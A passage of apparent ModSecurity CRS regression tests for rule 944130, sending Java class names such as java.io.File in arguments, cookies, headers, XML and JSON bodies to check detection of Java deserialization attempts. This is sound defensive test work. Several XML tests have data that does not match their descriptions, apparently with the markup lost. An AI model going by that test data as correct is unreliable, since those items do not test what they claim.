+ Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-55 + desc: "Argument test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-56 + desc: "Argument name includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-57 + desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-58 + desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-59 + desc: "Request header test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-60 + desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-61 + desc: "XML element value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + 
method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-62 + desc: "Nested XML element value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-63 + desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-64 + desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": 
\"java.io.ByteArrayOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-65 + desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-66 + desc: "Argument test includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-67 + desc: "Argument name includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader=test" + output: + log_contains: "id 
\"944130\"" + - test_title: 944130-68 + desc: "Cookie test includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.CharArrayReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-69 + desc: "Cookie name includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.CharArrayReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-70 + desc: "Request header test includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.CharArrayReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-71 + 
desc: "XML attribute value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-72 + desc: "XML element value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-73 + desc: "Nested XML element value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-74 + desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-75 + desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.CharArrayReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-76 + desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.CharArrayReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-77 + desc: "Argument test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-78 + desc: "Argument name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-79 + desc: "Cookie test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.DataInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-80 + desc: "Cookie name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.DataInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-81 + desc: "Request header test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.DataInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-82 + desc: "XML attribute value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-83 + desc: "XML element value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-84 + desc: "Nested XML element value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-85 + desc: "Content-Type text/plain includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-86 + desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.DataInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-87 + desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.DataInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-88 + desc: "Argument test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-89 + desc: "Argument name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-90 + desc: "Cookie test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.File + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-91 + desc: "Cookie name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.File=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-92 + desc: "Request header test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.File + method: "POST" + version: "HTTP/1.0" + data: "test=value" + 
output: + log_contains: "id \"944130\"" + - test_title: 944130-93 + desc: "XML attribute value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-94 + desc: "XML element value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-95 + desc: "Nested XML element value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-96 + desc: "Content-Type text/plain includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-97 + desc: "Content-Type application/json arg value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.File\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-98 + desc: "Content-Type application/json arg name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.File\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-99 + desc: "Argument test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
